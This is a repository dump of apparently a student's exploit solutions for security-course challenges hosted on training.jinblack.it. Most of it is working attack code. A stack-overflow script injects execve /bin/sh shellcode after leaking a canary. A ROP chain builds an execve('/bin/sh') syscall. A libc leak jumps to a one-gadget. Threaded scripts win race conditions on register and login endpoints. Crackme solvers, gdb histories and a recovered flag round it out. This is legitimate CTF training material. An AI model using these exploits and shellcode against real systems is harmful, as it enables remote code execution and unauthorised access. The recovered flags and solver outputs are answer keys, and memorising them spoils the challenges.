./exploit.py GDB 42 | gdbscript = ''' 43 | tbreak main 44 | continue 45 | '''.format(**locals()) 46 | 47 | #=========================================================== 48 | # EXPLOIT GOES HERE 49 | #=========================================================== 50 | # Arch: amd64-64-little 51 | # RELRO: Partial RELRO 52 | # Stack: Canary found 53 | # NX: NX disabled 54 | # PIE: No PIE (0x400000) 55 | # RWX: Has RWX segments 56 | 57 | cg = cyclic_gen() 58 | 59 | sh = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05' 60 | 61 | io = start() 62 | 63 | io.sendline(sh) 64 | io.send(cg.get(105)) 65 | io.recvuntil(b'xaaayaaazaabb') 66 | 67 | fake_canary = io.recv(7) 68 | canary = b'\x00' + fake_canary 69 | 70 | io.send(cg.get(104) + canary + cg.get(8) + p64(0x00404080)) 71 | io.sendline() 72 | 73 | io.interactive() 74 | 75 | #print(canary) 76 | #print(len(canary)) 77 | 78 | -------------------------------------------------------------------------------- /mitigations/leakers/leakers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/mitigations/leakers/leakers -------------------------------------------------------------------------------- /packer/.gdb_history: -------------------------------------------------------------------------------- 1 | b main 2 | b *0x0804970e 3 | r 4 | ni 5 | ru 6 | ni 7 | b entry 8 | b FUN_0804922b 9 | delete b 10 | delete break 11 | info b 12 | b *0x0804922b 13 | run 14 | ni 15 | b *0x08049289 16 | c 17 | ni 18 | ni 19 | c 20 | ni 21 | c 22 | delete break 23 | b *0x0804988a 24 | r 25 | vmmap 26 | dump memory john_dump 0x8049000 0x804a000 27 | ls 28 | q 29 | b *0x0804928a 30 | r 31 | dumpmem out all 32 | ls 33 | file out 34 | help dumpmem 35 | help mapname 36 | cat out 37 | clear 38 | q 39 | run 40 | b *0x0804928a 41 | q 42 | -------------------------------------------------------------------------------- /packer/john/.gdb_history: -------------------------------------------------------------------------------- 1 | c 2 | run flag{packer-4a35def} 3 | c 4 | run flag{packer-4a36def} 5 | c 6 | run flag{packer-4a37def} 7 | c 8 | run flag{packer-4a38def} 9 | c 10 | run flag{packer-4a39def} 11 | c 12 | run flag{packer-4a3adef} 13 | c 14 | run flag{packer-4a3bdef} 15 | c 16 | run flag{packer-4a3cdef} 17 | c 18 | run flag{packer-4a3ddef} 19 | c 20 | run flag{packer-4a3edef} 21 | c 22 | run flag{packer-4a3fdef} 23 | c 24 | run flag{packer-4a3gdef} 25 | c 26 | run flag{packer-4a3hdef} 27 | c 28 | run flag{packer-4a3jdef} 29 | c 30 | run flag{packer-4a3kdef} 31 | c 32 | run flag{packer-4a3ldef} 33 | c 34 | run flag{packer-4a3mdef} 35 | c 36 | run flag{packer-4a3ndef} 37 | c 38 | run flag{packer-4a3odef} 39 | c 40 | run flag{packer-4a3pdef} 41 | c 42 | run flag{packer-4a3qdef} 43 | c 44 | run flag{packer-4a3rdef} 45 | c 46 | run flag{packer-4a3sdef} 47 | c 48 | run flag{packer-4a3tdef} 49 | c 50 | run flag{packer-4a3udef} 51 | c 52 | run flag{packer-4a3vdef} 53 | c 54 | run flag{packer-4a3wdef} 55 | c 56 | run flag{packer-4a3xdef} 57 | c 58 | run flag{packer-4a3ydef} 59 | c 60 | run flag{packer-4a3zdef} 61 | c 62 | run flag{packer-4a3-def} 63 | c 64 | run flag{packer-4a3-0ef} 65 | c 66 | run flag{packer-4a3-1ef} 67 | c 68 | run flag{packer-4a3-1ef} 69 | c 70 | run flag{packer-4a3-15f} 71 | c 72 | run flag{packer-4a3-11f} 73 | c 74 | run flag{packer-4a3-10f} 75 | c 76 | c 77 | run flag{packer-4a3-12f} 78 | c 79 | run flag{packer-4a3-13f} 80 | c 81 | run flag{packer-4a3-13fffff} 82 | c 83 | run flag{packer-4a3-130ffff} 84 | x 85 | c 86 | run flag{packer-4a3-13-ffff} 87 | c 88 | run flag{packer-4a3-131ffff} 89 | c 90 | run flag{packer-4a3-132ffff} 91 | c 92 | run flag{packer-4a3-133ffff} 93 | c 94 | c 95 | run flag{packer-4a3-1337fff} 96 | c 97 | run flag{packer-4a3-1337-ff} 98 | c 99 | run flag{packer-4a3-13370ff} 100 | c 101 | run flag{packer-4a3-13371ff} 102 | c 103 | run flag{packer-4a3-13372ff} 104 | c 105 | run flag{packer-4a3-13373ff} 106 | c 107 | run flag{packer-4a3-13374ff} 108 | c 109 | run flag{packer-4a3-133745ff} 110 | run flag{packer-4a3-13375ff} 111 | c 112 | run flag{packer-4a3-13376ff} 113 | c 114 | run flag{packer-4a3-13377ff} 115 | c 116 | run flag{packer-4a3-13378ff} 117 | c 118 | run flag{packer-4a3-13379ff} 119 | c 120 | run flag{packer-4a3-1337aff} 121 | c 122 | run flag{packer-4a3-1337bff} 123 | c 124 | run flag{packer-4a3-1337cff} 125 | c 126 | run flag{packer-4a3-1337dff} 127 | c 128 | run flag{packer-4a3-1337eff} 129 | c 130 | run flag{packer-4a3-1337gff} 131 | c 132 | run flag{packer-4a3-1337fff} 133 | c 134 | run flag{packer-4a3-1337hff} 135 | c 136 | run flag{packer-4a3-1337iff} 137 | c 138 | run flag{packer-4a3-1337jff} 139 | c 140 | run flag{packer-4a3-1337kff} 141 | c 142 | run flag{packer-4a3-1337lff} 143 | c 144 | run flag{packer-4a3-1337mff} 145 | c 146 | run flag{packer-4a3-1337?ff} 147 | c 148 | run flag{packer-4a3-1337nff} 149 | c 150 | run flag{packer-4a3-1337off} 151 | c 152 | run flag{packer-4a3-1337pff} 153 | c 154 | run flag{packer-4a3-1337qff} 155 | c 156 | run flag{packer-4a3-1337rff} 157 | c 158 | run flag{packer-4a3-1337sff} 159 | c 160 | run flag{packer-4a3-1337tff} 161 | c 162 | run flag{packer-4a3-1337uff} 163 | c 164 | run flag{packer-4a3-1337vff} 165 | c 166 | run flag{packer-4a3-1337wff} 167 | c 168 | run flag{packer-4a3-1337xff} 169 | c 170 | run flag{packer-4a3-1337yff} 171 | c 172 | run flag{packer-4a3-1337zff} 173 | c 174 | run flag{packer-4a3-1337.ff} 175 | c 176 | run flag{packer-4a3-1337,ff} 177 | c 178 | run flag{packer-4a3-1337=ff} 179 | c 180 | run flag{packer-4a3-1337+ff} 181 | c 182 | run flag{packer-4a3-1337?ff} 183 | c 184 | c 185 | run flag{packer-4a3-1337@ff} 186 | c 187 | run flag{packer-4a3-1337#ff} 188 | c 189 | run flag{packer-4a3-1337$ff} 190 | c 191 | c 192 | run flag{packer-4a3-1337%ff} 193 | c 194 | run flag{packer-4a3-1337^ff} 195 | c 196 | run flag{packer-4a3-1337} 197 | c 198 | run flag{packer-4a3-1337<} 199 | run flag{packer-4a3-1337<} 200 | run flag{packer-4a3-1337>} 201 | c 202 | run flag{packer-4a3-1337/} 203 | c 204 | run flag{packer-4a3-1337(} 205 | run flag{packer-4a3-1337)} 206 | run flag{packer-4a3-1337_} 207 | c 208 | run flag{packer-4a3-1337|} 209 | run flag{packer-4a3-1337*} 210 | c 211 | run flag{packer-4a3-1337;} 212 | run flag{packer-4a3-1337:} 213 | c 214 | run flag{packer-4a3-1337~} 215 | c 216 | run flag{packer-4a3-1337.} 217 | c 218 | run flag{packer-4a3-1337,} 219 | c 220 | run flag{packer-4a3-1337+} 221 | c 222 | run flag{packer-4a3-1337-} 223 | c 224 | run flag{packer-4a3-1337`} 225 | run flag{packer-4a3-1337=} 226 | c 227 | c 228 | run flag{packer-4a3-1337A} 229 | c 230 | run flag{packer-4a3-1337B} 231 | c 232 | run flag{packer-4a3-1337C} 233 | c 234 | run flag{packer-4a3-1337D} 235 | c 236 | run flag{packer-4a3-1337E} 237 | c 238 | run flag{packer-4a3-1337F} 239 | c 240 | run flag{packer-4a3-1337G} 241 | c 242 | run flag{packer-4a3-1337aaaaaaa} 243 | c 244 | run flag{packer-4a3-1337baaaaaa} 245 | c 246 | run flag{packer-4a3-1337_aaaaaa} 247 | c 248 | run flag{packer-4a3-1337laaaaaa} 249 | c 250 | run flag{packer-4a3-1337kaaaaaa} 251 | c 252 | run flag{packer-4a3-1337waaaaaa} 253 | c 254 | run flag{packer-4a3-1337=-aaaaaa} 255 | c 256 | q 257 | -------------------------------------------------------------------------------- /packer/john/exploit.md: -------------------------------------------------------------------------------- 1 | # John 2 | 3 | I patched the executable to make it not encrypt the functions anymore 4 | 5 | I saw that the flag is evaluated each letter in eax, so I'm writing down the flag letter by letter: 6 | 7 | `flag{p}` 8 | -------------------------------------------------------------------------------- /packer/john/exploit.py: -------------------------------------------------------------------------------- 1 | import angr 2 | import claripy 3 | from pwn import * 4 | 5 | input_len = 33 6 | 7 | prog = angr.Project('./john', support_selfmodifying_code=True) 8 | prog.hook_symbol('ptrace', angr.SIM_PROCEDURES['stubs']['ReturnUnconstrained'](return_value=0)) 9 | 10 | find = [0x804983e] 11 | #avoid = [0x00400e92] 12 | 13 | input_flag = claripy.BVS('flag', input_len * 8) 14 | 15 | state = prog.factory.full_init_state(add_options=angr.options.unicorn, args=['./john', input_flag]) 16 | 17 | flag_start = 'flag{packer-4a3-1337' 18 | 19 | for i in range(len(flag_start)): 20 | state.add_constraints(input_flag.get_byte(i) == ord(flag_start[i])) 21 | 22 | simgr = prog.factory.simulation_manager(state) 23 | 24 | while simgr.active: 25 | simgr.run(n=20) 26 | if 'deadended' in simgr.stashes and simgr.deadended: 27 | simgr.stashes['deadended'] = simgr.deadended[-20:] 28 | if simgr.errored: 29 | simgr.errored = simgr.errored[-20:] 30 | 31 | assert simgr.deadended 32 | flag = simgr.deadended[-1].posix.dumps(0).split(b'\n')[0] 33 | import ipdb; ipdb.set_trace() 34 | 35 | print(flag) 36 | 37 | ''' 38 | 39 | simgr.explore(find=find#, 40 | #avoid=avoid 41 | ) 42 | 43 | if simgr.found: 44 | found = simgr.found[0] 45 | flag = found.solver.eval(input_flag) 46 | flag = bytearray.fromhex(str(hex(flag))[2:]) 47 | 48 | print('flag:', flag) 49 | ''' 50 | 51 | print('end.') 52 | 53 | -------------------------------------------------------------------------------- /packer/john/help.md: -------------------------------------------------------------------------------- 1 | # Notes 2 | 3 | `b *0x0x0804928a` 4 | 11 5 | ``` 6 | hbreak *0x804965b 7 | hbreak *0x8049640 8 | ``` 9 | 10 | eax must be 1 11 | 12 | st0 18053626334051.5782585 (raw 0x402b835b7fe05b1ca046) 13 | st1 9223372036854775808 (raw 0x403e8000000000000000) 14 | 15 | len is 33 16 | 17 | flag{packer-4a3-1337&-annoying__} 18 | -------------------------------------------------------------------------------- /packer/john/john: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/packer/john/john -------------------------------------------------------------------------------- /packer/john/john_dump: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/packer/john/john_dump -------------------------------------------------------------------------------- /packer/john/johnpatch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/packer/john/johnpatch -------------------------------------------------------------------------------- /packer/john/out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/packer/john/out -------------------------------------------------------------------------------- /packer/john/out_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/packer/john/out_patched -------------------------------------------------------------------------------- /packer/john/peda-session-john.txt: -------------------------------------------------------------------------------- 1 | hbreak *0x804965b 2 | hbreak *0x8049640 3 | 4 | -------------------------------------------------------------------------------- /packer/john/peda-session-johnpatch.txt: -------------------------------------------------------------------------------- 1 | break *0x0804928a 2 | 3 | -------------------------------------------------------------------------------- /packer/john/}: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/packer/john/} -------------------------------------------------------------------------------- /race/aart/exploit.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | from time import sleep 4 | from threading import Thread 5 | import string 6 | import random 7 | 8 | URL = "http://aart.training.jinblack.it" 9 | 10 | 11 | def id_generator(size=8, chars=string.ascii_uppercase + string.digits): 12 | return ''.join(random.choice(chars) for _ in range(size)) 13 | 14 | 15 | def register(user, password): 16 | target = '{}/register.php'.format(URL) 17 | data = { 18 | "username": user, 19 | "password": password 20 | } 21 | r = requests.post(target, data=data) 22 | #print(r) 23 | if "SUCCESS" in r.text: 24 | return True 25 | else: 26 | return False 27 | 28 | 29 | def login(user, password): 30 | target = '{}/login.php'.format(URL) 31 | data = { 32 | "username": user, 33 | "password": password 34 | } 35 | r = requests.post(target, data=data) 36 | #print(r) 37 | 38 | if 'flag' in r.text: 39 | print(r.text) 40 | sys.exit(0) 41 | 42 | 43 | while True: 44 | user = id_generator() 45 | password = id_generator() 46 | 47 | reg_thread = Thread(target=register, args=(user, password)) 48 | log_thread = Thread(target=login, args=(user, password)) 49 | 50 | reg_thread.start() 51 | log_thread.start() 52 | 53 | sleep(.05) 54 | -------------------------------------------------------------------------------- /race/metarace/exploit.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | from time import sleep 4 | from threading import Thread 5 | import string 6 | import random 7 | 8 | URL = "http://meta.training.jinblack.it/" 9 | 10 | 11 | def id_generator(size=8, chars=string.ascii_uppercase + string.digits): 12 | return ''.join(random.choice(chars) for _ in range(size)) 13 | 14 | 15 | def register(user, password): 16 | target = '{}/register.php'.format(URL) 17 | data = { 18 | "username": user, 19 | "password_1": password, 20 | "password_2": password, 21 | # backend checks if this is set 22 | "reg_user": "1" 23 | } 24 | r = requests.post(target, data=data) 25 | #print(r) 26 | if "Registration Completed!" in r.text: 27 | return True 28 | else: 29 | return False 30 | 31 | 32 | def login(user, password): 33 | s = requests.Session() 34 | target = '{}/login.php'.format(URL) 35 | target2 = '{}/index.php'.format(URL) 36 | data = { 37 | "username": user, 38 | "password": password, 39 | # backend checks if this is set 40 | "log_user": 1 41 | } 42 | r = s.post(target, data=data) 43 | #print(r) 44 | 45 | if 'Login Completed!' in r.text: 46 | r2 = s.get(target2) 47 | if 'flag' in r2.text: 48 | print(r2.text) 49 | sys.exit(0) 50 | 51 | 52 | while True: 53 | user = id_generator() 54 | password = id_generator() 55 | 56 | reg_thread = Thread(target=register, args=(user, password)) 57 | log_thread = Thread(target=login, args=(user, password)) 58 | 59 | reg_thread.start() 60 | log_thread.start() 61 | 62 | sleep(.05) 63 | -------------------------------------------------------------------------------- /reversing/crackme/.gdb_history: -------------------------------------------------------------------------------- 1 | b *001007a9 2 | b *00x1007a9 3 | b *0x01007a9 4 | r 5 | ni 6 | n 7 | q 8 | b main 9 | r 10 | ni 11 | q 12 | b main 13 | q 14 | b main 15 | r 16 | disass main 17 | ni 18 | q 19 | q 20 | b main 21 | r 22 | disass main 23 | ni 24 | handle SIGTRAP pass 25 | handle SIGTRAP nopass 26 | disass main 27 | b *0x5555555547dc 28 | c 29 | r 30 | c 31 | handle SIGTRAP nopass 32 | c 33 | handle SIGTRAP nopass 34 | r 35 | n 36 | q 37 | -------------------------------------------------------------------------------- /reversing/crackme/crackme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/reversing/crackme/crackme -------------------------------------------------------------------------------- /reversing/crackme/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def xor_strings(a, b): 4 | result = int(a, 16) ^ int(b, 16) # convert to integers and xor them together 5 | return '{:x}'.format(result) # convert back to hexadecimal 6 | 7 | 8 | key = [b'\x19', 9 | b'\x83', 10 | b'\x89', 11 | b'\xd2', 12 | b'\x6e', 13 | b'\x1f', 14 | b'\x84', 15 | b'\x1c', 16 | b'\x94', 17 | b'\x11', 18 | b'\x31', 19 | b'\x82', 20 | b'\xde', 21 | b'\x04', 22 | b'\xe9', 23 | b'\x9b', 24 | b'\xf0', 25 | b'\xc9', 26 | b'\x18', 27 | b'\xbb', 28 | b'\x82', 29 | b'\x51', 30 | b'\xaa', 31 | b'\xba', 32 | b'\x13', 33 | b'\x9e', 34 | b'\x44', 35 | b'\xec', 36 | b'\x49', 37 | b'\xe5', 38 | b'\xad', 39 | b'\x49', 40 | b'\x01', 41 | b'\x86', 42 | b'\xab', 43 | b'\x39', 44 | b'\x6a'] 45 | 46 | flag = [b'\x7f', 47 | b'\xef', 48 | b'\xe8', 49 | b'\xb5', 50 | b'\x15', 51 | b'\x73', 52 | b'\xb4', 53 | b'\x6a', 54 | b'\xa7', 55 | b'\x7d', 56 | b'\x48', 57 | b'\xdd', 58 | b'\xea', 59 | b'\x6a', 60 | b'\x9d', 61 | b'\xaa', 62 | b'\x82', 63 | b'\xfa', 64 | b'\x6e', 65 | b'\xe4', 66 | b'\xf6', 67 | b'\x23', 68 | b'\x9b', 69 | b'\xd9', 70 | b'\x78', 71 | b'\xab', 72 | b'\x1b', 73 | b'\x9b', 74 | b'\x16', 75 | b'\x96', 76 | b'\x9c', 77 | b'\x2e', 78 | b'\x6f', 79 | b'\xb2', 80 | b'\xc7', 81 | b'\x0c', 82 | b'\x17'] 83 | 84 | print(len(key)) 85 | print(len(flag)) 86 | 87 | dec_flag = '' 88 | 89 | for i in range(len(key)): 90 | dec_flag += chr(int.from_bytes(key[i], byteorder='little') ^ int.from_bytes(flag[i], byteorder='little')) 91 | 92 | print(dec_flag) 93 | 94 | 95 | -------------------------------------------------------------------------------- /reversing/keycheck_baby/exploit.py: -------------------------------------------------------------------------------- 1 | import claripy 2 | import angr 3 | 4 | p=angr.Project('./keycheck_baby') 5 | 6 | simfile = angr.SimPackets('input') 7 | 8 | st = p.factory.entry_state(stdin=simfile); 9 | sim = p.factory.simulation_manager(st) 10 | sim.explore(find=lambda s: b"Your input looks" in s.posix.dumps(1)) 11 | for s in sim.found: 12 | print(s.posix.dumps(0)) 13 | -------------------------------------------------------------------------------- /reversing/keycheck_baby/keycheck_baby: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/reversing/keycheck_baby/keycheck_baby -------------------------------------------------------------------------------- /reversing/revmem/exploit.sh: -------------------------------------------------------------------------------- 1 | ltrace ./revmem asdf 2 | -------------------------------------------------------------------------------- /reversing/revmem/revmem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/reversing/revmem/revmem -------------------------------------------------------------------------------- /reversing/revmemp/.gdb_history: -------------------------------------------------------------------------------- 1 | b * 0x00101342 2 | r 3 | q 4 | b *0x00101342 5 | b main 6 | b entry 7 | r 8 | ni 9 | q 10 | b 11 | disass 12 | disass main 13 | file 14 | file revmem 15 | b FUN_00101303 16 | disass * 17 | disass 18 | r 19 | q 20 | $ida 21 | help 22 | help files 23 | handle SIGTRAP nopass 24 | c 25 | re 26 | r 27 | handle SIGTRAP nopass 28 | handle SIGTRAP pass 29 | handle SIGTRAP nopass 30 | r 31 | q 32 | -------------------------------------------------------------------------------- /reversing/revmemp/revmem: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/reversing/revmemp/revmem -------------------------------------------------------------------------------- /reversing/revmemp/revmem_patched: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/reversing/revmemp/revmem_patched -------------------------------------------------------------------------------- /rop/emptyspaces/.gdb_history: -------------------------------------------------------------------------------- 1 | c 2 | q 3 | q 4 | q 5 | b main 6 | c 7 | r 8 | c 9 | ni 10 | q 11 | c 12 | c 13 | c 14 | r 15 | q 16 | target remote 21404 17 | target 21404 18 | target local 21404 19 | attach 21404 20 | ni 21 | vmmap 22 | attach 21462 23 | c 24 | vmmap 25 | attach 21542 26 | c 27 | attach 21550 28 | c 29 | attach 21564 30 | ni 31 | ni 32 | p/x 0x6b6000 33 | p/x *0x6b6000 34 | p/60x *0x6b6000 35 | p/60gx *0x6b6000 36 | x/60gx *0x6b6000 37 | x/60gx 0x6b6000 38 | x/60gx 0x6b6000 39 | attach 21592 40 | ni 41 | attach 21617 42 | ni 43 | attach 21641 44 | ni 45 | attach 21653 46 | ni 47 | attach 21661 48 | ni 49 | ni 50 | attach 21681 51 | ni 52 | attach 216932 53 | attach 21693 54 | ni 55 | attach 21770 56 | ni 57 | attach 21778 58 | ni 59 | attach 21786 60 | ni 61 | attach 21803 62 | ni 63 | ni 64 | attach 21839 65 | ni 66 | attach 21846 67 | ni 68 | attach 21879 69 | ni 70 | attach 21886 71 | ni 72 | ni 73 | attach 21932 74 | ni 75 | attach 21939 76 | ni 77 | attach 21947 78 | ni 79 | q 80 | attach 21961 81 | ni 82 | attach 21986 83 | ni 84 | attach 21994 85 | ni 86 | attach 2201 87 | attach 22001 88 | ni 89 | attach 22019 90 | ni 91 | si 92 | ni 93 | attach 22040 94 | ni 95 | attach 22050 96 | ni 97 | attach 22058 98 | ni 99 | si 100 | ni 101 | attach 22065 102 | attach 22065 103 | attach 22072 104 | ni 105 | si 106 | ni 107 | ni 108 | attach 22082 109 | ni 110 | attach 22094 111 | ni 112 | si 113 | ni 114 | attach 22113 115 | ni 116 | si 117 | ni 118 | attach 22173 119 | ni 120 | attach 22181 121 | ni 122 | si 123 | ni 124 | attach 22204 125 | attach 22210 126 | attach 22210 127 | ni 128 | attach 22216 129 | ni 130 | attach 22225 131 | ni 132 | si 133 | ni 134 | attach 22233 135 | ni 136 | attach 22250 137 | ni 138 | attach 22258 139 | ni 140 | attach 22266 141 | ni 142 | si 143 | ni 144 | ni 145 | attach 22273 146 | ni 147 | si 148 | ni 149 | attach 22292 150 | ni 151 | ni 152 | attach 22299 153 | ni 154 | si 155 | ni 156 | attach 22308 157 | ni 158 | si 159 | ni 160 | attach 22315 161 | ni 162 | si 163 | ni 164 | attach 22335 165 | ni 166 | ni 167 | attach 22343 168 | ni 169 | si 170 | ni 171 | attach 22351 172 | ni 173 | ni 174 | attach 22358 175 | n 176 | si 177 | ni 178 | ni 179 | attach 22383 180 | ni 181 | si 182 | ni 183 | ni 184 | attach 22390 185 | ni 186 | si 187 | ni 188 | attach 22398 189 | ni 190 | si 191 | ni 192 | attach 22415 193 | ni 194 | si 195 | ni 196 | ni 197 | attach 22436 198 | ni 199 | si 200 | ni 201 | attach 22445 202 | ni 203 | si 204 | ni 205 | attach 22461 206 | ni 207 | si 208 | ni 209 | ni 210 | attach 22480 211 | ni 212 | si 213 | ni 214 | ni 215 | q 216 | attach 22554 217 | ni 218 | attach 22569 219 | ni 220 | q 221 | -------------------------------------------------------------------------------- /rop/emptyspaces/core: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/emptyspaces/core -------------------------------------------------------------------------------- /rop/emptyspaces/emptyspaces: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Vechus/ODC-challenges/6c7a50f9fd4c9d575bdf4ae09eaf4b0449403973/rop/emptyspaces/emptyspaces -------------------------------------------------------------------------------- /rop/emptyspaces/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | # This exploit template was generated via: 4 | # $ pwn template --host training.jinblack.it --port 4006 emptyspaces 5 | from pwn import * 6 | 7 | # Set up pwntools for the correct architecture 8 | exe = context.binary = ELF('emptyspaces') 9 | 10 | # Many built-in settings can be controlled on the command-line and show up 11 | # in "args". For example, to dump all data sent/received, and disable ASLR 12 | # for all created processes... 13 | # ./exploit.py DEBUG NOASLR 14 | # ./exploit.py GDB HOST=example.com PORT=4141 15 | host = args.HOST or 'training.jinblack.it' 16 | port = int(args.PORT or 4006) 17 | 18 | def start_local(argv=[], *a, **kw): 19 | '''Execute the target binary locally''' 20 | if args.GDB: 21 | return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) 22 | else: 23 | return process([exe.path] + argv, *a, **kw) 24 | 25 | def start_remote(argv=[], *a, **kw): 26 | '''Connect to the process on the remote host''' 27 | io = connect(host, port) 28 | if args.GDB: 29 | gdb.attach(io, gdbscript=gdbscript) 30 | return io 31 | 32 | def start(argv=[], *a, **kw): 33 | '''Start the exploit against the target.''' 34 | if args.LOCAL: 35 | return start_local(argv, *a, **kw) 36 | else: 37 | return start_remote(argv, *a, **kw) 38 | 39 | # Specify your GDB script here for debugging 40 | # GDB will be launched if the exploit is run via e.g. 41 | # ./exploit.py GDB 42 | gdbscript = ''' 43 | b *0x0400c14 44 | tbreak main 45 | continue 46 | '''.format(**locals()) 47 | 48 | #=========================================================== 49 | # EXPLOIT GOES HERE 50 | #=========================================================== 51 | # Arch: amd64-64-little 52 | # RELRO: Partial RELRO 53 | # Stack: Canary found 54 | # NX: NX enabled 55 | # PIE: No PIE (0x400000) 56 | 57 | # rax rdi rsi rdx 58 | # read 0x00 unsigned int fd char *buf size_t count 59 | # execv 0x3b const char *name const char *const *argv const char *const *envp 60 | 61 | rip_pos = 72 62 | rip_pos_2 = 88 63 | 64 | io = start() 65 | input('start program...') 66 | 67 | # pop rdi ; ret 68 | # pop rsi ; ret 69 | # syscall 70 | # ret 71 | payload_read = p64(0x400696) + p64(0) + p64(0x410133) + p64(0x6b6000) + p64(0x4497ba) + p64(0x400416) 72 | 73 | print(len(payload_read)) 74 | 75 | # pop rdx ; ret 76 | payload_main_expanded = p64(0x4497c5) + p64(0x1000) 77 | 78 | # pop rax ; ret 79 | # pop rdi ; ret 80 | # pop rdx ; pop rsi ; ret 81 | # syscall 82 | payload_execve = p64(0x4155a4) + p64(0x3b) + p64(0x400696) + p64(0x6b6000) + p64(0x44bd59) + p64(0x6b6010) + p64(0x6b6010) + p64(0x40128c) 83 | log.info('payload execve len = ' + str(len(payload_execve))) 84 | 85 | # call main before read again 86 | io.sendline(cyclic(rip_pos) + payload_main_expanded + p64(0x00400bf8)) 87 | sleep(1) 88 | io.sendline(cyclic(rip_pos_2) + payload_read + payload_execve) 89 | sleep(1) 90 | io.send(b"/bin/sh\0") 91 | sleep(1) 92 | io.send(b"/bin/sh\0") 93 | sleep(1) 94 | io.send(b"/bin/sh\0") 95 | sleep(1) 96 | io.send(b"/bin/sh\0") 97 | sleep(1) 98 | io.send(b"/bin/sh\0") 99 | 100 | io.interactive() 101 | 102 | -------------------------------------------------------------------------------- /rop/positiveleak/.gdb_history: -------------------------------------------------------------------------------- 1 | attach 43766 2 | b *add_numbers+405 3 | r 4 | run 5 | q 6 | -------------------------------------------------------------------------------- /rop/positiveleak/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | from pwn import * 3 | context.terminal = ['gnome-terminal'] 4 | if args.REMOTE: 5 | r = remote("training.jinblack.it", 3003) 6 | else: 7 | r = process("./positiveleak", env={"LD_PRELOAD": "./libc-2.27.so"}) 8 | gdb.attach( 9 | r, 10 | """ 11 | b *add_numbers+405 12 | c 13 | """, 14 | ) 15 | input("Press any key to continue.") 16 | 17 | def assembly(num): 18 | # mov eax,DWORD PTR [rbp-0x1c] 19 | eax = [int(x) for x in bin(num)[2:]] 20 | # cdqe 21 | rax = [] 22 | for _ in range(16 - len(eax)): 23 | rax.append(0) 24 | for i in eax: 25 | rax.append(i) 26 | # shl rax,0x2 27 | rax = rax[2:] 28 | rax.append(0) 29 | rax.append(0) 30 | # lea rdx,[rax+0x8] 31 | rdx = int("".join(str(i) for i in rax), 2) + 0x8 32 | # mov eax,0x10 33 | eax = int(0x10) 34 | # sub rax,0x1 35 | rax = eax - 1 36 | # add rax,rdx 37 | rax += rdx 38 | # div rsi 39 | rax = int(rax / 0x10) 40 | # imul rax,rax,0x10 41 | rax *= 0x10 42 | 43 | return rax 44 | 45 | leak_pos = 4 46 | 47 | r.recvuntil("> ") 48 | r.sendline(b"0") 49 | r.recvuntil("> ") 50 | r.sendline(b"%d" % leak_pos) 51 | r.recvuntil("> ") 52 | r.sendline(b"0") 53 | 54 | for _ in range(0, leak_pos): 55 | r.recvuntil("> ") 56 | r.sendline(b"0") 57 | 58 | r.recvuntil("> ") 59 | r.sendline(b"1") 60 | 61 | for _ in range(0, leak_pos): 62 | r.recvuntil("0\n") 63 | 64 | leak = int(r.recvuntil("\n")[:-1]) 65 | gadget_addr = leak - 0x3EC680 + 0x4F322 66 | print("[!] leak: %s" % hex(leak)) 67 | print("[!] gadget_addr: %s" % hex(gadget_addr)) 68 | 69 | stack_num = 50 70 | stack_dist = int(assembly(stack_num) / 8) + 1 71 | 72 | r.recvuntil("> ") 73 | r.sendline(b"0") 74 | r.recvuntil("> ") 75 | r.sendline(b"%d" % stack_num) 76 | 77 | for i in range(0, stack_dist): 78 | r.recvuntil("> ") 79 | r.sendline(b"0") 80 | 81 | counter = int(hex(stack_dist + 5) + "00000000", 16) 82 | 83 | r.recvuntil("> ") 84 | r.sendline(b"%d" % counter) 85 | 86 | r.recvuntil("> ") 87 | r.sendline(b"%d" % gadget_addr) 88 | 89 | for i in range(0, 9): 90 | r.recvuntil("> ") 91 | r.sendline(b"0") 92 | 93 | r.recvuntil("> ") 94 | r.sendline(b"-1") 95 | 96 | r.interactive() -------------------------------------------------------------------------------- /rop/positiveleak/libc-2.27.so: -------------------------------------------------------------------------------- 